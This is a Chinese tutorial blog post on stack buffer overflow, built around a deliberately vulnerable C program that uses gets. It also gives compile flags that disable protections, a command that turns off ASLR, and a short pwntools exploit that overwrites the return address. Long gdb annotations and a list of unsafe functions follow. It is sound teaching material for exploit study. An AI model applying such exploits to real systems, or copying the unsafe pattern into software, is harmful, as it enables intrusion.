栈溢出的原理

news2024/12/28 9:04:36

目录

缓冲区

我们先以解决这个题目为准 然后通过这个题目去做透

gdb

代码段

 栈中

当前时刻寄存器存储的内容

1 寻找漏洞函数

输入

输出

字符串

2 确定填充长度

覆盖函数返回地址  

覆盖栈上变量的内容

覆盖bss段


栈溢出是在堆栈中 对某一个变量无限制的输入 超出了这个变量的字节数

从而导致了 超出这个变量本身的空间 覆盖到了上一个空间

这个是一个特定的缓冲区漏洞

缓冲区

缓冲区送内存中 存放临时输入输出的数据或者临时变量的区域

所以关于输入输出 所以是缓冲区漏洞

到此为止 我们能够发现 如果要实现栈溢出 有两个前提

(1)可以无限制的输入内容 
(2)程序向栈中存入数据

使用wiki的例子

#include <stdio.h>
#include <string.h>
void success() { puts("You Hava already controlled it."); }
void vulnerable() {
  char s[12];
  gets(s);
  puts(s);
  return;
}
int main(int argc, char **argv) {
  vulnerable();
  return 0;
}
gcc -m32 -fno-stack-protector stack_example.c -o stack_example -no-pie

使用gcc 对名为stack_example.c的文件进行编译

-m32 生成32位的程序 

-fno-stack-protector 不生成堆栈溢出保护 canary

-no-pie 不开启 pie保护 
如果程序开启了PIE保护的话,在每次加载程序时都变换加载地址,从而不能通过ROPgadget等一些工具来帮助解题

进行checksec查看

使用ubuntu 需要关闭aslr

临时关闭方法

echo 0 > /proc/sys/kernel/randomize_va_space

我们搞完这些 放入ida中看看 反编译

在VMware中安装新版Ubuntu后,无法跨虚拟机复制粘贴和拖拽文件的解决方法_ubuntu虚拟机不能粘贴复制_米修米修ne的博客-CSDN博客

这里给出最新版ubuntu 无法拖拽 vm都安装正常 还是不行的解决方法

 我们能发现反编译后 主函数就是我们写的主函数类型

 然后进入漏洞函数

 

同样的 

这里主要的是 gets函数 因为他可以无限制的输入内容 不检查输入的长度 只以回车为准

我们先以解决这个题目为准 然后通过这个题目去做透

发现s的长度为和ebp的距离位14

这里我们给出简易版流程图

 说明s的大小为14h

那么在32位中ebp的栈大小为 4个字节 所以如果我们要覆盖到 返回地址 就需要 14h+4h个字节

然后我们需要去找到返回的地址应该指向哪里

 shift+f12 得到controlled

发现success的地址

 

 源代码中也是success函数 就是我们的"shellcode"

所以我们开始运用pwntools写exp

from pwn import *
p=process('./stack_example')
payload=flat([b'A'*(0x14+0x04),0x08049186])
p.sendline(payload)
p.interactive()

发现我们已经控制了

解决完这个入门题

我们开始解读

gdb

我们开始gdb 的调试 这里我们需要了解一些单词

registers : 寄存器的状态

 这里是我们前面所学的寄存器 这里我来解释是什么意思

EAX: 0x80491e7 (<main>:	push   ebp)
这句话是 eax指向0x80491e7 它的内容是 把 ebp压入栈内

EBX: 0xf7e2a000 --> 0x229dac 
ebx存放的是 0xf7e2a000 --> 0x229dac这个值 这个可能是一个地址或者变量

ECX: 0xa0645a1a 
ecx存放的是xa0645a1a 也有可能是一个地址或者变量

EDX: 0xffffd140 --> 0xf7e2a000 --> 0x229dac 
edx中存放着0xffffd140 --> 0xf7e2a000 --> 0x229dac 的值 有可能是变量或地址

ESI: 0xffffd1d4 --> 0xffffd386 ("/root/下载/stack_example")
esi存放 0xffffd1d4 --> 0xffffd386 内容是("/root/下载/stack_example")

EDI: 0xf7ffcb80 --> 0x0 
edi存放着0xf7ffcb80 --> 0x0 

EBP: 0xffffd118 --> 0xf7ffd020 --> 0xf7ffda40 --> 0x0 
ebp存放0xffffd118 --> 0xf7ffd020 --> 0xf7ffda40 --> 0x0 

ESP: 0xffffd118 --> 0xf7ffd020 --> 0xf7ffda40 --> 0x0 
esp存放ESP: 0xffffd118 --> 0xf7ffd020 --> 0xf7ffda40 --> 0x0 

EIP: 0x80491ea (<main+3>:	and    esp,0xfffffff0)
eip存放0x80491ea 内容为 (<main+3>:	and    esp,0xfffffff0) 第一条指令
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
下面就是flags寄存器 然后判断有无溢出

代码段

0x80491e6 <vulnerable+53>:	ret 
在调用Vulnrable函数的时候的对于mian的返回地址  
   0x80491e7 <main>:	push   ebp
压入main的ebp
   0x80491e8 <main+1>:	mov    ebp,esp
把esp的值赋值给ebp用来准备函数的栈帧
=> 0x80491ea <main+3>:	and    esp,0xfffffff0
对esp取16倍的整数 用来栈对齐
   0x80491ed <main+6>:	call   0x8049203 <__x86.get_pc_thunk.ax>
调用函数<__x86.get_pc_thunk.ax> 取当前的地址 存储在eax中
   0x80491f2 <main+11>:	add    eax,0x2e0e
为上面的地址继续加入偏移量得到 <vulnerable>函数的地址
   0x80491f7 <main+16>:	call   0x80491b1 <vulnerable>
调用函数Vulnrable
   0x80491fc <main+21>:	mov    eax,0x0
把eax设置为0




这里执行完Vulnrable函数后 会通过ret执行 moveax,0x0这条指令

 栈中

[------------------------------------stack-------------------------------------]
0000| 0xffffd118 --> 0xf7ffd020 --> 0xf7ffda40 --> 0x0 
这里 表示为第一个栈帧 0xffffd118   并且里面的内容是
由指针链组成 0xf7ffd020 0xf7ffda40  0x0  这里可能指向的是某个变量或函数调用地址
0004| 0xffffd11c --> 0xf7c21519 (<__libc_start_call_main+121>:	add    esp,0x10)
这里 表示为第二个栈帧 0xffffd11c   内容为
有一个指针 0xf7c21519  他的内容为 函数调用的内容 并且汇编为 add esp,0x10 
这里是指向esp <__libc_start_call_main+121> 并且偏移量为12的地址

0008| 0xffffd120 --> 0x1 
这里 表示为第三个栈帧 0xffffd120
为整数1 可能是某个标志

下面两个栈帧都是指向字符串 的
0012| 0xffffd124 --> 0xffffd1d4 --> 0xffffd386 ("/root/下载/stack_example")
0016| 0xffffd128 --> 0xffffd1dc --> 0xffffd3a1 ("SHELL=/bin/bash")

下面两个是指向相同地址的指针
0020| 0xffffd12c --> 0xffffd140 --> 0xf7e2a000 --> 0x229dac 
0024| 0xffffd130 --> 0xf7e2a000 --> 0x229dac 


0028| 0xffffd134 --> 0x80491e7 (<main>:	push   ebp)
最后一个栈帧 0xffffd134 指向了0x80491e7 内容为 压入ebp
这里是main函数的开始 压入上一个栈帧的ebp 

当前时刻寄存器存储的内容

─────────────────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────────────────────
*EAX  0x80491e7 (main) ◂— 0x83e58955
这里存储的 main函数的开始  0x83e58955表示从这个地址得到的main函数地址


*EBX  0xf7e2a000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x229dac
EBX存放着 (_GLOBAL_OFFSET_TABLE_) got表的地址 0x229dac为该地址的偏移量

*ECX  0xa19f0c5c
ECX存放着 0xa19f0c5c


*EDX  0xffffd140 —▸ 0xf7e2a000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x229dac
EDX存放着0xffffd140 —▸ 0xf7e2a000 指针链 并且指向的是got表 偏移量为0x229dac


*EDI  0xf7ffcb80 (_rtld_global_ro) ◂— 0x0
EDI存放着 0xf7ffcb80 内容是(_rtld_global_ro) 动态链接器 只要函数使用了共享库的内容 edi就会指向 共享库中的函数地址

*ESI  0xffffd1d4 —▸ 0xffffd386 ◂— 0x6f6f722f ('/roo')
ESI指针存放着指针链 并且是从另一个指针0x6f6f722f ('/roo') 得到

*EBP  0xffffd118 —▸ 0xf7ffd020 (_rtld_global) —▸ 0xf7ffda40 ◂— 0x0
EBP指向0xffffd118 0xf7ffd020 0xf7ffda40 这三个指针
_rtld_global 是运行时链接器 (run-time linker) 的全局数据结构,用于跟踪动态链接库和符号解析等信息。


*ESP  0xffffd118 —▸ 0xf7ffd020 (_rtld_global) —▸ 0xf7ffda40 ◂— 0x0
ESP和EBP指向的是一样的 因为函数还没有开始 
*EIP  0x80491ea (main+3) ◂— 0xe8f0e483

EIP指针指向 main+3的地址 作为下一条指令

► 0x80491ea <main+3>                     and    esp, 0xfffffff0
把esp的后四位清零 作为一个栈帧

   0x80491ed <main+6>                     call   __x86.get_pc_thunk.ax                     <__x86.get_pc_thunk.ax>
调用函数 
 
   0x80491f2 <main+11>                    add    eax, 0x2e0e
把0x2e0e赋值给eax

   0x80491f7 <main+16>                    call   vulnerable                     <vulnerable>
开始调用函数
 
   0x80491fc <main+21>                    mov    eax, 0
把eax清零

   0x8049201 <main+26>                    leave  
退出main函数

   0x8049202 <main+27>                    ret  
从main函数返回
  
 
   0x8049203 <__x86.get_pc_thunk.ax>      mov    eax, dword ptr [esp]
   0x8049206 <__x86.get_pc_thunk.ax+3>    ret    
 
   0x8049207                              add    bl, dh

这里我们发现 main函数也是一个被调用函数 他也有ret 并且在ret执行两次后会结束该程序

给出最后的结论

1 寻找漏洞函数

输入

gets

scanf

vscanf

输出

printf

字符串

strcpy 字符串复制

strcat 字符串拼接

bcopy 复制内存制定地址的前n个字符

2 确定填充长度

覆盖函数返回地址  

看ebp

覆盖栈上变量的内容

进行计算

覆盖bss段

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/467841.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【三十天精通Vue 3】第十九天 Vue 3的渐进式Web应用程序详解

✅创作者&#xff1a;陈书予 &#x1f389;个人主页&#xff1a;陈书予的个人主页 &#x1f341;陈书予的个人社区&#xff0c;欢迎你的加入: 陈书予的社区 &#x1f31f;专栏地址: 三十天精通 Vue 3 文章目录 引言一、什么是渐进式 Web 应用程序1.1 渐进式 Web 应用程序的定义…

市场预测美联储加息的有效性几何

美联储加息已狂飙一年&#xff0c;很多相关预测美联储加息降息的文章都会提到“一年内加息多少次的概率是多少多少”这种表述&#xff0c;那么这个数据是怎样计算的&#xff1f;本期笔者将简单讨论美国联邦利率的运作机制&#xff0c;介绍用于预测联储加/降息概率的方式&#x…

vue批量生成二维码,打印生成的二维码,并批量下载生成的二维码,qrcode

通过使用 qrcode 生成二维码&#xff0c; 使用 jszip 打包批量二维码文件&#xff0c; 使用 file-saver 下载打包好的zip文件&#xff0c; 使用 vue-print-nb 打印生成的二维码 生成二维码&#xff1a; 打印二维码 下载二维码 1. 批量生成二维码—安装依赖 ![请添加图片描述]…

CH32F203RCT6 pin2pin兼容STM32F103RCT6

32位大容量通用型Cortex-M3单片机 CH32F203是基于Cortex-M3内核设计的工业级大容量通用微控制器&#xff0c;此系列主频高达144MHz&#xff0c;独立了GPIO电压&#xff08;与系统供电分离&#xff09;。资源同比增加了随机数单元&#xff0c;4组运放比较器&#xff1b;提高串口…

硅烷PEG马来酰亚胺,Silane-PEG-Mal,马来酰亚胺聚乙二醇硅烷

中文名称&#xff1a;马来酰亚胺聚乙二醇硅烷 英文名称&#xff1a;Silane-PEG-Maleimide&#xff0c;Silane-PEG-MAL 性状&#xff1a;液体或者固体&#xff0c;取决于分子量 溶剂&#xff1a;溶于水、DMSO、DMF、DCM等常规性有机溶剂 活性基团&#xff1a;MAL 分子量&am…

【spring事务】源码分析

项目启动时&#xff0c;创建代理过程 initializeBean.applyBeanPostProcessorsAfterInitialization 由AnnotationAwareAspectJAutoProxyCreator来处理 AnnotationAwareAspectJAutoProxyCreator wrapIfNecessary 通过getAdvicesAndAdvisorsForBean获取bean满足的Advisor&…

DHCP 服务器监控

网络中使用了数千个 IP 地址&#xff0c;当今大多数组织中的 IP 地址都由 DHCP 服务器提供服务。必须发现可用的 IP 地址、了解如何预配 IP 并了解 IP 池利用率。使用 DHCP 服务器进行 IP 预配可以更轻松地获得这些重要见解&#xff0c;并根据组织的不同需求分配不同的范围。这…

SYSU程设c++(第十周)继承与派生、继承的访问控制、继承的构造函数与析构函数

继承与派生 使用背景&#xff1a; 当定义一个新的类 B 时&#xff0c;如果发现类 B 拥有某个已写好的类 A 的全部特性&#xff0c;此外还有类 A 没有的特性&#xff0c;那么就不必从头重写类 B&#xff0c;而是把类 A 作为一个“基类”&#xff08;也称“父类”&#xff09;&a…

【正则表达式上】——03全栈开发——如桃花来

目录索引 介绍&#xff1a;常见匹配模式&#xff1a; re.match()方法&#xff1a;常规匹配&#xff1a;泛匹配&#xff1a; 匹配目标-匹配分组&#xff1a;贪婪匹配&#xff1a;非贪婪匹配&#xff1a; 介绍&#xff1a; 正则表达式是对字符串操作的一种逻辑公式&#xff0c;就…

Unsupervised Point Cloud Pre-training via Occlusion Completion

题目&#xff1a;Unsupervised Point Cloud Pre-training via Occlusion Completion 摘要 方法&#xff1a; 提出一种用于点云的预训练方法Occlusion Completion (OcCo) 技术细节&#xff1a; mask相机视角里被遮挡的点学习一个encoder-decoder模型&#xff0c;用于重建被遮…

如何批量修改删除html文件中的标签属性

最近工作中遇到一个问题&#xff0c;一份html文档因为内容里面的样式标签过多导致文件整体过大。 这些描述标签不是必须的&#xff0c;现在需要优化删除掉这些标签从而减小文件体积。 对于这种批量修改删除的任务&#xff0c;我们首先想到的就是使用编辑器处理。 编辑html文…

Linux网络——Shell编程规范与变量

Linux网络——Shell编程规范与变量 一、Shell脚本概述1.Shel脚本的概念2.Shell脚本应用场景3.Shell的作用 二、编写第一个Shell脚本1.Shell脚本的构成2.运行 Shell 脚本 三、重定向与管道操作1.交互式硬件设备2.重定向操作3.管道操作符号 " | " 四、Shell变量的作用、…

滤筒除尘器

滤筒除尘器以滤筒作为过滤元件所组成或采用脉冲喷吹的除尘器。 滤筒除尘器按安装方式分&#xff0c;可以分为斜插式 侧装式&#xff0c;吊装式&#xff0c;上装式。 滤筒除尘器按滤筒材料分&#xff0c;可以分为长纤维聚酯滤筒除尘器&#xff0c;复合纤维滤筒除尘器&#xff0c…

Whistle安装与使用

1、安装npm 网上搜索安装教程&#xff0c;但是使用npm安装软件的时候一直报错 修复方案&#xff0c;将http改成https 2、安装whistle : npm install whistle -g 以及配置见下面两篇文章 爬虫工具—whistle安装与使用 - 简书 whistle安装以及使用_奔跑的蜗牛_爱阳光的博客-C…

拼多多Temu新增欧洲六国站点,席卷全球,你还在观望吗?

4月24日消息&#xff0c;消息称&#xff0c;拼多多跨境电商平台Temu已于4月21日正式上线其英国站点&#xff0c;而其德国站、荷兰站、意大利站、法国站与西班牙站也均于昨日上线。至此&#xff0c;拼多多Temu已在全球共开设了10个海外市场。 登陆上述六大欧洲站点&#xff0c;…

【self-instruct方式生成语料代码实战】

self-instruct方式生成语料代码实战 self-instruct 介绍self-instruct 框架生成语料代码实现过程Step1 通过模型生成新的指令Step2 对模型生成的指令进行判断Step3&#xff1a;根据Step2的判断结果&#xff0c;给出不同的输出Step4&#xff1a;过滤及后处理 本文对 self-instru…

(二)Eureka 高可用

1、Eureka 高可用介绍 EurekaServer可以是一个集群&#xff0c;形成高可用的Eureka注册中心 多个Eureka Server之间也会互相注册为服务&#xff0c;当服务提供者注册到Eureka Server集群中的某个节点时&#xff0c;该节点会把服务的信息同步给集群中的每个节点&#xff0c;从…

你还不知道iOS备忘录的10个使用技巧吗?那就OUT了!

案例&#xff1a;苹果备忘录的使用技巧 【友友们&#xff0c;苹果备忘录有哪些好用的使用技巧&#xff1f;可以分享一下吗&#xff1f;】 作为一款简单而实用的应用程序&#xff0c;ios备忘录可以帮助您记录生活中的各种事件、任务、待办事项等信息。除此之外&#xff0c;它还…

[架构之路-176]-《软考-系统分析师》-1-嵌入式系统分析与设计 - 实时性(任务切换时间、中断延迟时间、中断响应时间)、可靠性、功耗、体积、成本

目录 前言&#xff1a; 1 7 . 1 嵌 入 式 系 统 概 述 1 . 嵌入式系统的特点 (1) 系统专用性强。 (2) 系统实时性强。 (3) 软硬件依赖性强 (4) 处理器专用。 ( 5 ) 多种技术紧密结合。 (6) 系统透明性。 (7) 系统资源受限。 2 . 嵌入式系统的组成 1 7 . 3 嵌入式实…

第七章 3D地形搭建(下)

上一章节我们介绍了地形编辑&#xff0c;接下来介绍Paint Trees&#xff08;绘制树木&#xff09;。 由于树木属于3D模型&#xff0c;初学者不可能通过3ds max或者maya软件进行制作&#xff0c;因此我们还是建议大家从官方资源商店上面去下载免费的。这里我们依然使用上个章节…